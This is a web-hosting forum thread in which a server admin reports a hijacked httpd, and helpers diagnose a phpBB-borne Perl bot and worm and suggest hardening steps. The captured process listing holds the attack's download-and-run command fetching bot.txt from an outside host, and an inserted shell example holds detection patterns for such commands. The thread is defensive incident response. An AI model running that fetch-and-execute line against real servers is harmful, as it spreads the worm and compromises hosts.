Urgent, please help or advise me

Hello,

since this morning, I have a huge problem with the interworx-cp httpd server.

There is another httpd running named hsphere. I didn’t install this at all.

When I stop my httpd service and kill all /hsphere/…/httpd jobs, then restart the httpd service, the hsphere httpd server comes back. Is it a hack?

18837 ? S 0:00 /usr/sbin/httpd -DSSL
18840 ? S 0:00 _ /usr/sbin/httpd -DSSL
18865 ? Z 0:00 | _ [sh <defunct>]
18841 ? S 0:01 _ /usr/sbin/httpd -DSSL
18842 ? S 0:00 _ /usr/sbin/httpd -DSSL
18843 ? S 0:00 _ /usr/sbin/httpd -DSSL
18844 ? S 0:00 _ /usr/sbin/httpd -DSSL
19490 ? Z 0:00 | _ [sh <defunct>]
18846 ? S 0:00 _ /usr/sbin/httpd -DSSL
19482 ? Z 0:00 | _ [sh <defunct>]
18848 ? S 0:02 _ /usr/sbin/httpd -DSSL
18849 ? S 0:00 _ /usr/sbin/httpd -DSSL
18850 ? S 0:00 _ /usr/sbin/httpd -DSSL
18851 ? S 0:00 _ /usr/sbin/httpd -DSSL
18874 ? S 0:01 _ /usr/sbin/httpd -DSSL
18875 ? S 0:00 _ /usr/sbin/httpd -DSSL
18869 ? R 0:47 /hsphere/shared/apache/bin/httpd -DSSL
18872 ? S 0:00 /usr/bin/httpd -DSSL
19486 ? R 0:50 /hsphere/shared/apache/bin/httpd -DSSL
19489 ? S 0:00 /usr/bin/httpd -DSSL
19501 ? S 0:00 /hsphere/shared/apache/bin/httpd -DSSL
19504 ? S 0:00 /usr/bin/httpd -DSSL

the [sh <defunct>] seems to be a perl program. I have huge perl programs running in top.

I have updated my locate database (updatedb) and tried to locate hsphere (locate hsphere) but I didn’t find it :\

Do you know a tool to check if some files have changed or have been corrupted, or … to check if I’ve been hacked?

The problem now is that I had to stop my httpd service, because as soon as I start it all the perl programs and the hsphere httpd restart. My load average then goes up to 50.

Advice? Solutions?

Thanks
Pascal

More …

I’ve run rkhunter and chkrootkit but found nothing.

But I’ve seen this when I tried to restart the httpd service:

17666 ? S 0:00 _ /usr/sbin/httpd -DSSL
17669 ? S 0:00 _ sh -c cd /tmp;wget www.tenhaseusite.com/bot.txt;perl bot.txt;wget www.tenhaseusite.com/wor
17676 ? R 0:00 _ perl worm.txt

How to protect the httpd server against this?

Thanks

Check your /tmp and you will probably find worm.txt and bot.txt files. The attacker most likely got in through the recent phpBB vulnerabilities and used them to download / execute the bot. The script runs with the /hsphere path on purpose to throw off investigations.

How to protect? Use a firewall to block unused ports (the script uses 6667 to communicate), install mod_security to filter out “bad” URLs as you find them, chmod wget 700 as the script uses wget to get the file, and finally UPDATE PHPBB! :slight_smile:

You won’t find anything via rkhunter or chkrootkit as this isn’t a rootkit or even a root exploit.

Chris
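Added example, not from the thread: three small shell checks that run over a saved `ps axf` listing and flag the patterns Chris describes (the wget-then-perl child under httpd, scripts hidden as .txt, and an "httpd" whose binary does not exist on disk). The sample listing and its hostname are constructed.

```shell
#!/bin/sh
# Added example, not from the thread. Triage helpers for a saved `ps axf`
# listing (PID TTY STAT TIME COMMAND), the same layout as the outputs above.

# Constructed sample listing modelled on the thread (placeholder domain,
# not real data).
SAMPLE_PS='18837 ? S 0:00 /usr/sbin/httpd -DSSL
17666 ? S 0:00 _ /usr/sbin/httpd -DSSL
17669 ? S 0:00 _ sh -c cd /tmp;wget www.example.invalid/bot.txt;perl bot.txt
17676 ? R 0:00 _ perl worm.txt
18869 ? R 0:47 /hsphere/shared/apache/bin/httpd -DSSL
18872 ? S 0:00 /usr/bin/httpd -DSSL'

# 1. The download-and-run step: a shell spawned under httpd that changes to
#    /tmp, fetches a file with wget/curl and hands it to an interpreter.
find_download_and_run() {
    printf '%s\n' "$1" | grep -E 'sh -c .*cd /tmp;.*(wget|curl) .*;.*(perl|sh|python)'
}

# 2. An interpreter executing a .txt file: the worm hid its code as bot.txt
#    and worm.txt so the names look harmless in a directory listing.
find_script_as_txt() {
    printf '%s\n' "$1" | grep -E '(perl|sh|python)[^ ]* [^ ]*\.txt( |$)'
}

# 3. Processes that call themselves httpd but whose path is not an executable
#    on this machine (the bot renamed itself; "locate hsphere" found nothing
#    because no such file exists). Prints "<pid> <path>" per hit. On a live
#    system also compare with `readlink /proc/<pid>/exe`, since a process can
#    rewrite its own argv.
find_fake_httpd() {
    printf '%s\n' "$1" |
    awk '{ for (i = 5; i <= NF; i++) if ($i ~ /\/httpd$/) print $1, $i }' |
    while read -r pid path; do
        [ -x "$path" ] || echo "$pid $path"
    done
}

# Run against the constructed sample; on a real box feed it "$(ps axf)".
find_download_and_run "$SAMPLE_PS"
find_script_as_txt "$SAMPLE_PS"
find_fake_httpd "$SAMPLE_PS"
```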

Thanks Chris,

You’re right, I found a ton of bot.txt and worm.txt files.
I’ve deleted them.

But I do not understand, as I already use a firewall and block port 6667.
In fact I block every port not known for IN but allow all ports for OUT.

It should come in through port 80 (I allow it) but go out through any port.

Ok for the wget.

For phpBB my version is up to date, but maybe not one of my customers’.

For mod_security, do you have an rpm archive?

Thanks for your help Chris

Pascal

[QUOTE=pascal]
But I do not understand, as I already use a firewall and block port 6667.
In fact I block every port not known for IN but allow all ports for OUT.
[/QUOTE]

Actually it looks like “bot” listens on the first port it can and “worm” connects to google to search for and infect more servers.

[QUOTE=pascal]
For phpBB my version is up to date, but maybe not one of my customers’.
[/QUOTE]

Indeed, we saw the same thing with one of our clients this morning as well. It was actually a phpBB phpNuke mod.

[QUOTE=pascal]
For mod_security, do you have an rpm archive?
[/QUOTE]

http://updates.interworx.info/iworx/RPMS/nexcess/cos3x/i386/mod_security-1.8.4-1.iworx.i386.rpm

USE THE ABOVE AT YOUR OWN RISK. IT IS UNSUPPORTED

Chris

Thanks Chris for everything.

[QUOTE=Chris]
USE THE ABOVE AT YOUR OWN RISK. IT IS UNSUPPORTED
[/QUOTE]

Ok, but do you know of any bad impact on interworx-cp?

Pascal

Thanks Chris.

Since I’ve put the chmod 700 on wget everything seems to be OK.

I’ll look for a tutorial for mod_security to install it. Indeed, I do not know it and have never installed it.

Thanks for everything and let me wish you a happy Christmas

Pascal

That is a source RPM if I’m not mistaken, so it puts the files it extracts in the same place (subdirectory) as your other RedHat (or CentOS or whatever you are running) sources. Can’t remember right now. You then need to compile it.

Chris, where is wget to chmod it (in a bin directory somewhere I assume)?

To both of you (and anyone else reading) I hope you had a great Christmas and have a happy new year!

Actually, that’s a link to the CentOS bin rpm (which I think Pascal uses). The SRPM is here: http://updates.interworx.info/iworx/SRPMS/nexcess/mod_security-1.8.4-1.iworx.src.rpm

It’s in /usr/bin Tim:

[root@storage1 storoot]# which wget
/usr/bin/wget

Merry x-mas to all as well :slight_smile:

Chris

I must have really been tired not to have seen that.

[QUOTE=Chris]
It’s in /usr/bin Tim:

[root@storage1 storoot]# which wget
/usr/bin/wget
[/QUOTE]

Thanks, I’m gonna do that now.

BTW, is this the same one that got me before or something else?

[QUOTE=Chris]
Merry x-mas to all as well :slight_smile:
[/QUOTE]

Thanks Chris.

Tim

Hello,

Does somebody have a good HOWTO or tutorial about mod_security?

Thanks
Pascal